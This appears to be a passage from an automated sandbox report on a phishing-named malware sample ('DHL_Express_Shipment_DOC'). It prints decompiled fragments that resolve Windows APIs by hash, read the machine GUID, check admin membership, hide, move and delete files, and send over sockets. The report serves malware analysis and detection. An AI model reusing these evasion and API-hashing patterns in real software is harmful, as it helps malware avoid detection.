                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
				int _t7;
				void* _t8;

				E004031E5(_t8, 9, 0xecae3497, 0, 0);
				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
				return _t7;
			}





                    0x00406094
                    0x004060a8
                    0x004060ab

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402C03(struct HINSTANCE__* _a4, char _a8) {
				_Unknown_base(*)()* _t5;
				void* _t6;

				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
				_t1 =  &_a8; // 0x403173
				_t5 = GetProcAddress(_a4,  *_t1); // executed
				return _t5;
			}





                    0x00402c10
                    0x00402c15
                    0x00402c1b
                    0x00402c1e

                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 92%
                    			E00404A52(void* _a4, char* _a8, char* _a12) {
				void* _v8;
				int _v12;
				void* __ebx;
				char* _t10;
				long _t13;
				char* _t27;

				_push(_t21);
				_t27 = E00402B7C(0x208);
				if(_t27 == 0) {
					L4:
					_t10 = 0;
				} else {
					E00402B4E(_t27, 0, 0x208);
					_v12 = 0x208;
					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
					if(_t13 != 0) {
						E00402BAB(_t27);
						goto L4;
					} else {
						E004031E5(0, 9, 0xfe9f661a, 0, 0);
						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
						E00404A39(_v8); // executed
						_t10 = _t27;
					}
				}
				return _t10;
			}









                    0x00404a56
                    0x00404a65
                    0x00404a6a
                    0x00404ad1
                    0x00404ad1
                    0x00404a6c
                    0x00404a71
                    0x00404a79
                    0x00404a85
                    0x00404a9a
                    0x00404a9e
                    0x00404acb
                    0x00000000
                    0x00404aa0
                    0x00404aac
                    0x00404abc
                    0x00404ac1
                    0x00404ac6
                    0x00404ac6
                    0x00404a9e
                    0x00404ad9

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                    Download Yara Rule
                    C-Code - Quality: 40%
                    			E004060BD(void* __eflags) {
				signed int _v8;
				char _v12;
				short _v16;
				char _v20;
				void* __ebx;
				intOrPtr* _t12;
				signed int _t13;
				intOrPtr* _t14;
				signed int _t15;
				void* _t24;

				_v16 = 0x500;
				_v20 = 0;
				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				_v8 = _t13;
				if(_t13 != 0) {
					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t15;
					E0040604F(_v12);
					return _v8;
				}
				return _t13;
			}













                    0x004060c6
                    0x004060d5
                    0x004060d8
                    0x004060f4
                    0x004060f6
                    0x004060fb
                    0x0040610a
                    0x00406115
                    0x0040611c
                    0x0040611e
                    0x00406121
                    0x00000000
                    0x0040612a
                    0x0040612f

                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
				void* _t3;
				int _t5;

				_t3 = E00403D4D(__eflags, _a4); // executed
				if(_t3 == 0) {
					__eflags = 0;
					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
					_t5 = CreateDirectoryW(_a4, 0); // executed
					return _t5;
				} else {
					return 1;
				}
			}





                    0x00403c68
                    0x00403c70
                    0x00403c78
                    0x00403c82
                    0x00403c8b
                    0x00403c8f
                    0x00403c72
                    0x00403c76
                    0x00403c76

                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E0040642C(void* __eflags) {
				short _v40;
				intOrPtr* _t6;
				void* _t10;

				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
				 *_t6( &_v40); // executed
				return 0 | _v40 == 0x00000009;
			}






                    0x0040643c
                    0x00406445
                    0x00406454

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                    Download Yara Rule
                    C-Code - Quality: 37%
                    			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;

				_t5 = _a12;
				if(_t5 == 0) {
					_t5 = E00405D0B(_a8) + 1;
				}
				__imp__#19(_a4, _a8, _t5, 0); // executed
				return _t5;
			}




                    0x00404eed
                    0x00404ef2
                    0x00404efd
                    0x00404efd
                    0x00404f07
                    0x00404f0e

                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
				int _t6;
				void* _t7;

				E004031E5(_t7, 0, 0xc9143177, 0, 0);
				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
				return _t6;
			}





                    0x00403bdd
                    0x00403beb
                    0x00403bee

                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13networkCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E0040427D(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
				return _t4;
			}





                    0x0040428a
                    0x00404297
                    0x0040429a

                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction ID: e837d3b0865cda380a04769d40cc561620ee701a25bf2a33446201ee5459e2a9
                    • Opcode Fuzzy Hash: 8dd52a8075b7bef316d0fc581140073ef821e073e46509cdb91d5efed9f2b539
                    • Instruction Fuzzy Hash: A9C092B054430C3EFA102EF29D4AD3B3A8EEB41648B008435BE08E9096E977DE2061A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404A19 Relevance: 1.5, APIs: 1, Instructions: 13registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00404A19(void* _a4, short* _a8, void** _a12) {
				long _t5;
				void* _t6;

				E004031E5(_t6, 9, 0xdb552da5, 0, 0);
				_t5 = RegOpenKeyW(_a4, _a8, _a12); // executed
				return _t5;
			}





                    0x00404a27
                    0x00404a35
                    0x00404a38

                    APIs
                    • RegOpenKeyW.ADVAPI32(?,?,?,00000009,DB552DA5,00000000,00000000), ref: 00404A35
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
                    • Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
                    • Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}





                    0x00403c4d
                    0x00403c55
                    0x00403c58

                    APIs
                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification
                    • String ID:
                    • API String ID: 2591292051-0
                    • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                    • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                    • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}





                    0x00403c15
                    0x00403c1d
                    0x00403c20

                    APIs
                    • DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: DeleteFile
                    • String ID:
                    • API String ID: 4033686569-0
                    • Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
                    • Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
                    • Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}





                    0x00402c2c
                    0x00402c34
                    0x00402c37

                    APIs
                    • LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
                    • Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
                    • Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}





                    0x00403bfc
                    0x00403c04
                    0x00403c07

                    APIs
                    • FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
                    • Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
                    • Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}





                    0x00403bc4
                    0x00403bcc
                    0x00403bcf

                    APIs
                    • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                    • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                    • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                    0x00404a0d
                    0x00404a15
                    0x00404a18

                    APIs
                    • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                    • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                    • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                    0x00403b72
                    0x00403b7a
                    0x00403b7d

                    APIs
                    • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID:
                    • API String ID: 1174141254-0
                    • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                    • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                    • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • closesocket.WS2_32(00404EB0), ref: 00404DEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: closesocket
                    • String ID:
                    • API String ID: 2781271927-0
                    • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                    • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                    • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

